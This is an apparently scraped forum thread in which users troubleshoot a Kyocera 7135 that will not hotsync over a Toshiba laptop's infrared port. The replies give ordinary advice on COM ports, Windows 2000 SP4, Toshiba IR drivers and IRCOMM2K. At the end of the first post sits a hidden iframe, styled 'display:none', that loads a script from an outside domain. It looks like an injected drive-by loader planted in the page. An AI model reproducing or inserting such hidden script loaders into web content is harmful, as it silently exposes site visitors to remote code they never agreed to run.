can't hotsync 7135 using IR port on toshiba laptop

I just purchased my 7135 today and have been trying to set it up to hotsync using the IR port on my toshiba TE2100 laptop. The IR port on the laptop appears to be working properly. When I try to sync, the little icon appears on the toolbar and indicates that the laptop is communicating with the phone. However, I then get an error message saying "The connection between your handheld computer and the desktop could not be established. Please check your setup and try again"

I am using Palm OS 4.01. Would anyone know why I cannot hotsync using the IR feature.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Make sure the com port used by your IR matches the one selected in your hotsync setup. This should solve the problem.

The answer to your question may depend on the version of Windows you are using. (I'm assuming you use Windows.) If you are using Windows 2000 without the latest service pack (SP4), there is a good chance your problem is related to the fact that Windows 2000 did not originally support the IRCOMM standard that most handheld devices use to communicate with Infrared. If you install SP4, it should solve this problem. This link may take you to the SP4 download page:

http://www.microsoft.com/windows2000...ult.asp#getsp4

See Microsoft Knowledge Base Article - 252795 for more information about this problem. The KB article may be at:

http://support.microsoft.com/default...NoWebContent=1 ; otherwise, do a search for KB article 252795.

The second problem may be related to your Toshiba IR ("FIR") driver. Be sure you have the latest driver installed, as Toshiba has had problems with IR port communication in general over the years, but I found their more recent drivers to work fine. (I have a Tecra 8200 running Windows 2000 SP4 and can sync my Kyocera 7135 to it (abeit VERY slowly---especially when syncing with an MS-Exchange Server.)

If your palm sync does not list IR as an option, check palm support, I think I downloaded some patch to make mine work. Slower than snails though.

I used IRCOMM2K and it fixed all my problems with my 7135 to Toshiba Satellite hotsync problems.
